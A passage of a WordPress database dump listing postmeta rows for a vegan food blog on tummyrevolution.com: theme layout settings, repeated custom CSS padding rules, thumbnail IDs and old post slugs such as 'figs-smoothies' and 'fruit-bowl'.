3,1037,'qodef_title_text_color_meta','#3c3c3c'),(6234,1037,'qodef_title_area_background_image_behavior_meta','parallax'),(6235,1037,'qodef_blog_single_sidebar_layout_meta','sidebar-33-right'),(6236,1037,'_wp_old_slug','substitute-for-milk-is-inevitable-for-vegans'),(6237,1037,'_wp_old_slug','substitute-for-milk-is-inevitable-for-vegans-2'),(6238,1037,'_wp_old_slug','veggie-recepies-for-fast-breakfast-solutions'),(6239,1037,'_wp_old_slug','organic-vegan-cosmetic-make-up-products'),(6240,1037,'_wp_old_slug','perfect-organic-vegan-make-up-products'),(6241,1037,'_wp_old_slug','veggie-recepies-for-fast-breakfast-solutions-2'),(6242,1037,'_dp_original','910'),(6243,1037,'_wp_old_slug','organic-vegan-cosmetics-and-make-up'),(6244,1037,'qodef_page_content_top_padding','40'),(6245,1037,'qodef_page_content_top_padding_mobile','yes'),(6248,2070,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6250,2070,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6256,2070,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6257,2070,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6258,2070,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6259,2070,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6260,2070,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6261,2070,'_thumbnail_id','5020'),(6262,2070,'slide_template','default'),(6263,2070,'_wpb_vc_js_status','true'),(6264,2070,'qodef_page_content_behind_header_meta','no'),(6265,2070,'qodef_boxed_background_image_attachment_meta','fixed'),(6266,2070,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(6267,2070,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(6268,2070,'qodef_video_type_meta','social_networks'),(6269,2070,'qodef_audio_type_meta','social_networks'),(6270,2070,'qodef_post_skin','qodef-post-light-skin'),(6271,2070,'qodef_disable_vertical_header_background_image_meta','no'),(6272,2070,'qodef_disable_header_widget_logo_area_meta','no'),(6273,2070,'qodef_disable_header_widget_menu_area_meta','no'),(6274,2070,'qodef_title_area_height_meta','140'),(6275,2070,'qodef_title_area_background_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/blog-title-area-1.jpg'),(6276,2070,'qodef_title_area_title_tag_meta','h2'),(6277,2070,'qodef_title_text_color_meta','#3c3c3c'),(6278,2070,'qodef_title_area_background_image_behavior_meta','parallax'),(6279,2070,'qodef_blog_single_sidebar_layout_meta','sidebar-33-right'),(6280,2070,'_wp_old_slug','substitute-for-milk-is-inevitable-for-vegans'),(6281,2070,'_wp_old_slug','substitute-for-milk-is-inevitable-for-vegans-2'),(6282,2070,'_wp_old_slug','veggie-recepies-for-fast-breakfast-solutions'),(6283,2070,'_wp_old_slug','organic-vegan-cosmetic-make-up-products'),(6284,2070,'_wp_old_slug','perfect-organic-vegan-make-up-products'),(6285,2070,'_wp_old_slug','veggie-recepies-for-fast-breakfast-solutions-2'),(6286,2070,'_wp_old_slug','organic-vegan-cosmetics-and-make-up'),(6287,2070,'_dp_original','1037'),(6288,2070,'qodef_blog_single_custom_sidebar_area_meta','home-6'),(6289,2070,'qodef_page_content_top_padding','40'),(6290,2070,'qodef_page_content_top_padding_mobile','yes'),(6293,2120,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6295,2120,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6302,2120,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6303,2120,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6304,2120,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6305,2120,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6306,2120,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6307,2120,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6308,2120,'_thumbnail_id','5023'),(6309,2120,'slide_template','default'),(6310,2120,'_wpb_vc_js_status','true'),(6311,2120,'qodef_page_content_behind_header_meta','no'),(6312,2120,'qodef_boxed_background_image_attachment_meta','fixed'),(6313,2120,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(6314,2120,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(6315,2120,'qodef_video_type_meta','social_networks'),(6316,2120,'qodef_audio_type_meta','social_networks'),(6317,2120,'qodef_post_skin','qodef-post-light-skin'),(6318,2120,'qodef_disable_vertical_header_background_image_meta','no'),(6319,2120,'qodef_disable_header_widget_logo_area_meta','no'),(6320,2120,'qodef_disable_header_widget_menu_area_meta','no'),(6321,2120,'qodef_title_area_height_meta','140'),(6322,2120,'qodef_title_area_background_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/blog-title-area-1.jpg'),(6323,2120,'qodef_title_area_title_tag_meta','h2'),(6324,2120,'qodef_title_text_color_meta','#3c3c3c'),(6325,2120,'qodef_title_area_background_image_behavior_meta','parallax'),(6326,2120,'qodef_blog_single_sidebar_layout_meta','sidebar-33-right'),(6327,2120,'_wp_old_slug','substitute-for-milk-is-inevitable-for-vegans'),(6328,2120,'_wp_old_slug','substitute-for-milk-is-inevitable-for-vegans-2'),(6329,2120,'_wp_old_slug','veggie-recepies-for-fast-breakfast-solutions'),(6330,2120,'_wp_old_slug','organic-vegan-cosmetic-make-up-products'),(6331,2120,'_wp_old_slug','perfect-organic-vegan-make-up-products'),(6332,2120,'_wp_old_slug','veggie-recepies-for-fast-breakfast-solutions-2'),(6333,2120,'_wp_old_slug','organic-vegan-cosmetics-and-make-up'),(6334,2120,'_dp_original','2070'),(6335,2120,'qodef_blog_single_custom_sidebar_area_meta','home-6'),(6336,2120,'qodef_page_content_top_padding','40'),(6337,2120,'qodef_page_content_top_padding_mobile','yes'),(6340,2126,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6342,2126,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6350,2126,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6351,2126,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6352,2126,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6353,2126,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6354,2126,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6355,2126,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6356,2126,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6357,2126,'_thumbnail_id','5028'),(6358,2126,'slide_template','default'),(6359,2126,'_wpb_vc_js_status','true'),(6360,2126,'qodef_page_content_behind_header_meta','no'),(6361,2126,'qodef_boxed_background_image_attachment_meta','fixed'),(6362,2126,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(6363,2126,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(6364,2126,'qodef_video_type_meta','social_networks'),(6365,2126,'qodef_audio_type_meta','social_networks'),(6366,2126,'qodef_post_skin','qodef-post-light-skin'),(6367,2126,'qodef_disable_vertical_header_background_image_meta','no'),(6368,2126,'qodef_disable_header_widget_logo_area_meta','no'),(6369,2126,'qodef_disable_header_widget_menu_area_meta','no'),(6370,2126,'qodef_title_area_height_meta','140'),(6371,2126,'qodef_title_area_background_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/blog-title-area-1.jpg'),(6372,2126,'qodef_title_area_title_tag_meta','h2'),(6373,2126,'qodef_title_text_color_meta','#3c3c3c'),(6374,2126,'qodef_title_area_background_image_behavior_meta','parallax'),(6375,2126,'qodef_blog_single_sidebar_layout_meta','sidebar-33-right'),(6376,2126,'_wp_old_slug','substitute-for-milk-is-inevitable-for-vegans'),(6377,2126,'_wp_old_slug','substitute-for-milk-is-inevitable-for-vegans-2'),(6378,2126,'_wp_old_slug','veggie-recepies-for-fast-breakfast-solutions'),(6379,2126,'_wp_old_slug','organic-vegan-cosmetic-make-up-products'),(6380,2126,'_wp_old_slug','perfect-organic-vegan-make-up-products'),(6381,2126,'_wp_old_slug','veggie-recepies-for-fast-breakfast-solutions-2'),(6382,2126,'_wp_old_slug','organic-vegan-cosmetics-and-make-up'),(6383,2126,'_dp_original','2120'),(6384,2126,'qodef_blog_single_custom_sidebar_area_meta','home-6'),(6385,2126,'qodef_page_content_top_padding','40'),(6386,2126,'qodef_page_content_top_padding_mobile','yes'),(6389,2132,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6391,2132,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6400,2132,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6401,2132,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6402,2132,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6403,2132,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6404,2132,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6405,2132,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6406,2132,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6407,2132,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6408,2132,'_thumbnail_id','5030'),(6409,2132,'slide_template','default'),(6410,2132,'_wpb_vc_js_status','false'),(6411,2132,'qodef_page_content_behind_header_meta','no'),(6412,2132,'qodef_boxed_background_image_attachment_meta','fixed'),(6413,2132,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(6414,2132,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(6415,2132,'qodef_video_type_meta','social_networks'),(6416,2132,'qodef_audio_type_meta','social_networks'),(6417,2132,'qodef_post_skin','qodef-post-light-skin'),(6418,2132,'qodef_disable_vertical_header_background_image_meta','no'),(6419,2132,'qodef_disable_header_widget_logo_area_meta','no'),(6420,2132,'qodef_disable_header_widget_menu_area_meta','no'),(6421,2132,'qodef_title_area_height_meta','140'),(6422,2132,'qodef_title_area_background_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/blog-title-area-1.jpg'),(6423,2132,'qodef_title_area_title_tag_meta','h2'),(6424,2132,'qodef_title_text_color_meta','#3c3c3c'),(6425,2132,'qodef_title_area_background_image_behavior_meta','parallax'),(6426,2132,'qodef_blog_single_sidebar_layout_meta','sidebar-33-right'),(6427,2132,'_wp_old_slug','substitute-for-milk-is-inevitable-for-vegans'),(6428,2132,'_wp_old_slug','substitute-for-milk-is-inevitable-for-vegans-2'),(6429,2132,'_wp_old_slug','veggie-recepies-for-fast-breakfast-solutions'),(6430,2132,'_wp_old_slug','organic-vegan-cosmetic-make-up-products'),(6431,2132,'_wp_old_slug','perfect-organic-vegan-make-up-products'),(6432,2132,'_wp_old_slug','veggie-recepies-for-fast-breakfast-solutions-2'),(6433,2132,'_wp_old_slug','organic-vegan-cosmetics-and-make-up'),(6434,2132,'_dp_original','2126'),(6435,2132,'_wp_old_slug','figs-smoothies'),(6436,2132,'qodef_blog_single_custom_sidebar_area_meta','home-6'),(6437,2132,'qodef_page_content_top_padding','40'),(6438,2132,'qodef_page_content_top_padding_mobile','yes'),(6441,2138,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6443,2138,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6453,2138,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6454,2138,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6455,2138,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6456,2138,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6457,2138,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6458,2138,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6459,2138,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6460,2138,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6461,2138,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6462,2138,'_thumbnail_id','5032'),(6463,2138,'slide_template','default'),(6464,2138,'_wpb_vc_js_status','true'),(6465,2138,'qodef_page_content_behind_header_meta','no'),(6466,2138,'qodef_boxed_background_image_attachment_meta','fixed'),(6467,2138,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(6468,2138,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(6469,2138,'qodef_video_type_meta','social_networks'),(6470,2138,'qodef_audio_type_meta','social_networks'),(6471,2138,'qodef_post_skin','qodef-post-light-skin'),(6472,2138,'qodef_disable_vertical_header_background_image_meta','no'),(6473,2138,'qodef_disable_header_widget_logo_area_meta','no'),(6474,2138,'qodef_disable_header_widget_menu_area_meta','no'),(6475,2138,'qodef_title_area_height_meta','140'),(6476,2138,'qodef_title_area_background_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/blog-title-area-1.jpg'),(6477,2138,'qodef_title_area_title_tag_meta','h2'),(6478,2138,'qodef_title_text_color_meta','#3c3c3c'),(6479,2138,'qodef_title_area_background_image_behavior_meta','parallax'),(6480,2138,'qodef_blog_single_sidebar_layout_meta','sidebar-33-right'),(6481,2138,'_wp_old_slug','substitute-for-milk-is-inevitable-for-vegans'),(6482,2138,'_wp_old_slug','substitute-for-milk-is-inevitable-for-vegans-2'),(6483,2138,'_wp_old_slug','veggie-recepies-for-fast-breakfast-solutions'),(6484,2138,'_wp_old_slug','organic-vegan-cosmetic-make-up-products'),(6485,2138,'_wp_old_slug','perfect-organic-vegan-make-up-products'),(6486,2138,'_wp_old_slug','veggie-recepies-for-fast-breakfast-solutions-2'),(6487,2138,'_wp_old_slug','organic-vegan-cosmetics-and-make-up'),(6488,2138,'_wp_old_slug','figs-smoothies'),(6489,2138,'_dp_original','2132'),(6490,2138,'_wp_old_slug','veggie-dinner'),(6491,2138,'qodef_blog_single_custom_sidebar_area_meta','home-6'),(6492,2138,'qodef_page_content_top_padding','40'),(6493,2138,'qodef_page_content_top_padding_mobile','yes'),(6496,2142,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6498,2142,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6505,2142,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6506,2142,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6507,2142,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6508,2142,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6509,2142,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6510,2142,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6511,2142,'slide_template','default'),(6512,2142,'_wpb_vc_js_status','false'),(6513,2142,'qodef_page_content_behind_header_meta','no'),(6514,2142,'qodef_boxed_background_image_attachment_meta','fixed'),(6515,2142,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(6516,2142,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(6517,2142,'qodef_video_type_meta','social_networks'),(6518,2142,'qodef_audio_type_meta','social_networks'),(6519,2142,'qodef_post_skin','qodef-post-light-skin'),(6520,2142,'qodef_disable_vertical_header_background_image_meta','no'),(6521,2142,'qodef_disable_header_widget_logo_area_meta','no'),(6522,2142,'qodef_disable_header_widget_menu_area_meta','no'),(6523,2142,'qodef_title_area_height_meta','140'),(6524,2142,'qodef_title_area_background_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/blog-title-area-1.jpg'),(6525,2142,'qodef_title_area_title_tag_meta','h2'),(6526,2142,'qodef_title_text_color_meta','#3c3c3c'),(6527,2142,'qodef_title_area_background_image_behavior_meta','parallax'),(6528,2142,'qodef_blog_single_sidebar_layout_meta','sidebar-33-right'),(6529,2142,'_wp_old_slug','substitute-for-milk-is-inevitable-for-vegans'),(6530,2142,'_wp_old_slug','substitute-for-milk-is-inevitable-for-vegans-2'),(6531,2142,'_wp_old_slug','veggie-recepies-for-fast-breakfast-solutions'),(6532,2142,'_wp_old_slug','organic-vegan-cosmetic-make-up-products'),(6533,2142,'_wp_old_slug','perfect-organic-vegan-make-up-products'),(6534,2142,'_wp_old_slug','veggie-recepies-for-fast-breakfast-solutions-2'),(6535,2142,'_wp_old_slug','organic-vegan-cosmetics-and-make-up'),(6536,2142,'_dp_original','2070'),(6537,2142,'_wp_old_slug','fruit-bowl'),(6538,2142,'_wp_old_slug','fruit-bowl-2'),(6539,2142,'qodef_blog_list_featured_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/blog-img-4.jpg'),(6540,2142,'_thumbnail_id','3943'),(6541,2142,'qodef_page_content_top_padding','40'),(6542,2142,'qodef_page_content_top_padding_mobile','yes'),(6543,2142,'qodef_blog_single_custom_sidebar_area_meta','home-6'),(6546,2143,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6547,2143,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6548,2143,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6549,2143,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6550,2143,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6551,2143,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6552,2143,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6553,2143,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6554,2143,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6555,2143,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6556,2143,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6557,2143,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6558,2143,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6559,2143,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6560,2143,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6561,2143,'slide_template','default'),(6562,2143,'_wpb_vc_js_status','true'),(6563,2143,'qodef_page_content_behind_header_meta','no'),(6564,2143,'qodef_boxed_background_image_attachment_meta','fixed'),(6565,2143,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(6566,2143,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(6567,2143,'qodef_video_type_meta','social_networks'),(6568,2143,'qodef_audio_type_meta','social_networks'),(6569,2143,'qodef_post_skin','qodef-post-light-skin'),(6570,2143,'qodef_disable_vertical_header_background_image_meta','no'),(6571,2143,'qodef_disable_header_widget_logo_area_meta','no'),(6572,2143,'qodef_disable_header_widget_menu_area_meta','no'),(6573,2143,'qodef_title_area_height_meta','140'),(6574,2143,'qodef_title_area_background_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/blog-title-area-1.jpg'),(6575,2143,'qodef_title_area_title_tag_meta','h2'),(6576,2143,'qodef_title_text_color_meta','#3c3c3c'),(6577,2143,'qodef_title_area_background_image_behavior_meta','parallax'),(6578,2143,'qodef_blog_single_sidebar_layout_meta','sidebar-33-right'),(6579,2143,'_wp_old_slug','substitute-for-milk-is-inevitable-for-vegans'),(6580,2143,'_wp_old_slug','substitute-for-milk-is-inevitable-for-vegans-2'),(6581,2143,'_wp_old_slug','veggie-recepies-for-fast-breakfast-solutions'),(6582,2143,'_wp_old_slug','organic-vegan-cosmetic-make-up-products'),(6583,2143,'_wp_old_slug','perfect-organic-vegan-make-up-products'),(6584,2143,'_wp_old_slug','veggie-recepies-for-fast-breakfast-solutions-2'),(6585,2143,'_wp_old_slug','organic-vegan-cosmetics-and-make-up'),(6586,2143,'_dp_original','2070'),(6587,2143,'_wp_old_slug','fruit-bowl'),(6588,2143,'_wp_old_slug','fruit-bowl-3'),(6589,2143,'qodef_blog_list_featured_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/blog-img-13.jpg'),(6590,2143,'_thumbnail_id','3941'),(6591,2143,'qodef_page_content_top_padding','40'),(6592,2143,'qodef_blog_single_custom_sidebar_area_meta','home-6'),(6593,2143,'qodef_show_title_area_meta','no'),(6594,2143,'qodef_page_content_top_padding_mobile','yes'),(6597,2144,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6599,2144,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6606,2144,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6607,2144,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6608,2144,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6609,2144,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6610,2144,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6611,2144,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6612,2144,'slide_template','default'),(6613,2144,'_wpb_vc_js_status','true'),(6614,2144,'qodef_page_content_behind_header_meta','no'),(6615,2144,'qodef_boxed_background_image_attachment_meta','fixed'),(6616,2144,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(6617,2144,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(6618,2144,'qodef_video_type_meta','social_networks'),(6619,2144,'qodef_audio_type_meta','social_networks'),(6620,2144,'qodef_post_skin','qodef-post-light-skin'),(6621,2144,'qodef_disable_vertical_header_background_image_meta','no'),(6622,2144,'qodef_disable_header_widget_logo_area_meta','no'),(6623,2144,'qodef_disable_header_widget_menu_area_meta','no'),(6624,2144,'qodef_title_area_height_meta','140'),(6625,2144,'qodef_title_area_background_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/blog-title-area-1.jpg'),(6626,2144,'qodef_title_area_title_tag_meta','h2'),(6627,2144,'qodef_title_text_color_meta','#3c3c3c'),(6628,2144,'qodef_title_area_background_image_behavior_meta','parallax'),(6629,2144,'qodef_blog_single_sidebar_layout_meta','sidebar-33-right'),(6630,2144,'_wp_old_slug','substitute-for-milk-is-inevitable-for-vegans'),(6631,2144,'_wp_old_slug','substitute-for-milk-is-inevitable-for-vegans-2'),(6632,2144,'_wp_old_slug','veggie-recepies-for-fast-breakfast-solutions'),(6633,2144,'_wp_old_slug','organic-vegan-cosmetic-make-up-products'),(6634,2144,'_wp_old_slug','perfect-organic-vegan-make-up-products'),(6635,2144,'_wp_old_slug','veggie-recepies-for-fast-breakfast-solutions-2'),(6636,2144,'_wp_old_slug','organic-vegan-cosmetics-and-make-up'),(6637,2144,'_dp_original','2070'),(6638,2144,'_wp_old_slug','fruit-bowl'),(6639,2144,'_wp_old_slug','fruit-bowl-4'),(6640,2144,'qodef_blog_list_featured_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/blog-img-12.jpg'),(6641,2144,'_thumbnail_id','5021'),(6642,2144,'qodef_page_content_top_padding','40'),(6643,2144,'qodef_page_content_top_padding_mobile','yes'),(6644,2144,'qodef_blog_single_custom_sidebar_area_meta','home-6'),(6647,2145,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6648,2145,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6649,2145,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6650,2145,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6651,2145,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6652,2145,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6653,2145,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6654,2145,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6655,2145,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6656,2145,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6657,2145,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6658,2145,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6659,2145,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6660,2145,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6661,2145,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6662,2145,'slide_template','default'),(6663,2145,'_wpb_vc_js_status','true'),(6664,2145,'qodef_page_content_behind_header_meta','no'),(6665,2145,'qodef_boxed_background_image_attachment_meta','fixed'),(6666,2145,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(6667,2145,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(6668,2145,'qodef_video_type_meta','social_networks'),(6669,2145,'qodef_audio_type_meta','social_networks'),(6670,2145,'qodef_post_skin','qodef-post-light-skin'),(6671,2145,'qodef_disable_vertical_header_background_image_meta','no'),(6672,2145,'qodef_disable_header_widget_logo_area_meta','no'),(6673,2145,'qodef_disable_header_widget_menu_area_meta','no'),(6674,2145,'qodef_title_area_height_meta','140'),(6675,2145,'qodef_title_area_background_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/blog-title-area-1.jpg'),(6676,2145,'qodef_title_area_title_tag_meta','h2'),(6677,2145,'qodef_title_text_color_meta','#3c3c3c'),(6678,2145,'qodef_title_area_background_image_behavior_meta','parallax'),(6679,2145,'qodef_blog_single_sidebar_layout_meta','sidebar-33-right'),(6680,2145,'_wp_old_slug','substitute-for-milk-is-inevitable-for-vegans'),(6681,2145,'_wp_old_slug','substitute-for-milk-is-inevitable-for-vegans-2'),(6682,2145,'_wp_old_slug','veggie-recepies-for-fast-breakfast-solutions'),(6683,2145,'_wp_old_slug','organic-vegan-cosmetic-make-up-products'),(6684,2145,'_wp_old_slug','perfect-organic-vegan-make-up-products'),(6685,2145,'_wp_old_slug','veggie-recepies-for-fast-breakfast-solutions-2'),(6686,2145,'_wp_old_slug','organic-vegan-cosmetics-and-make-up'),(6687,2145,'_dp_original','2070'),(6688